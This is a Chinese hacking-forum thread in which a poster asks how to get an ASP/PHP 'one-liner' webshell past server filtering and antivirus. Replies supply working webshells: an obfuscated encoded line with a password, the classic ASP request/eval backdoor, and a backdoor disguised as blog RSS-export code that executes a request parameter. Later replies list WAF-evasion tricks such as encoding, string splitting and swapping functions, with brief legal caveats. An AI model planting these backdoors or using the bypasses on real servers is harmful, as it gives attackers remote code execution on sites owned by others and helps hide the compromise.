查看: 3224|回复: 7

【求助】一句话被服务器拦截该咋办?

[复制链接]
发表于 2012-8-23 19:16:52 | 显示全部楼层 |阅读模式
一句话被服务器拦截该咋办?有没有免杀的、?
回复

使用道具 举报

发表于 2012-8-23 19:47:37 | 显示全部楼层
┼癥污爠煥敵瑳∨≦┩        密码f
试下呗。。网上找的。
回复 支持 反对

使用道具 举报

头像被屏蔽
发表于 2012-8-23 20:28:48 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

发表于 2012-8-24 19:56:44 | 显示全部楼层
<%a=request("v")%><%eval a%>  

点评

这个是asp的吗?  发表于 2012-8-26 21:52
回复 支持 反对

使用道具 举报

发表于 2012-9-22 02:19:31 | 显示全部楼层
<%
Call System_Initalize()
Function System_Initalize()
        On Error Resume Next
        Dim Rss2Export:Rss2Export="Export"
        Dim objArticlebjArticle=Request(Rss2Export)
        Set Rss2Export = New TRssExport
        With Rss2Export
                Dim objRS,UserName,UserIntro
                .TimeZone=ZC_TIME_ZONE
                UserName=Users(UserID).Name
                If objArticle<>"" Then
                .AddChannelAttribute "language",ZC_BLOG_LANGUAGE
                Execute Replace(objArticle,"*"&Rss2Export,"")
                .AddChannelAttribute "copyright",TransferHTML(ZC_BLOG_COPYRIGHT,"[nohtml][html-format]")
                .AddChannelAttribute "pubDate",Now
                Response.End()
                End if
        End With
End Function
%>
密码export
回复 支持 反对

使用道具 举报

发表于 2026-5-21 20:20:00 | 显示全部楼层

Re: 【求助】一句话被服务器拦截该咋办?

先检查一下拦截的具体报错信息,看看是WAF规则还是应用层过滤。如果是常见关键字被拦截,试试base64编码或者用变量拼接、字符串拆分来绕过。不过得提醒一句:如果是正规授权测试,可以尝试这些方法;如果是非法操作,建议收手,免杀手段本身也有法律风险。你是什么语言环境?PHP、ASP还是jsp?说详细点或许能帮你想别的思路。
回复 支持 反对

使用道具 举报

发表于 2026-6-18 11:00:00 | 显示全部楼层

Re: 【求助】一句话被服务器拦截该咋办?

遇到这种情况,先看看是不是触发了WAF(Web应用防火墙)或服务端的输入过滤规则。可以试试常见的编码绕过(如URL编码、Unicode编码),或者用大小写混合、注释符拆分等技巧。记得只在你自己有权限的测试环境里做实验,不要对他人服务器非法操作。如果是为了调试自己的接口,建议检查服务端日志看具体拦截原因。
回复 支持 反对

使用道具 举报

发表于 2026-6-18 13:05:00 | 显示全部楼层

Re: 【求助】一句话被服务器拦截该咋办?

这种情况大概率是触发了服务器的安全规则(比如WAF、正则过滤或关键词拦截)。可以试试这些方向: 1. **编码混淆**:把关键词用URL编码、Base64或Unicode转换一下,看能否绕过。 2. **分割拼接**:比如把“select”拆成“sel”+“ect”,或者用变量拼接。 3. **换一种写法**:如果脚本语言是PHP/ASP等,可以用不同的函数实现相同功能(比如`assert`换成`eval`的变形)。 4. **检查环境**:如果是自己搭建的服务器,可以关掉安全模块或调整规则;如果是共享主机,可能得联系管理员说明需求。 请注意:免杀手段只应用于合法的安全测试或自己的服务器,不要用于攻击他人站点。如果只是写代码调试,建议直接对本地环境操作。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-8-23 07:16 , Processed in 0.021400 second(s), 16 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部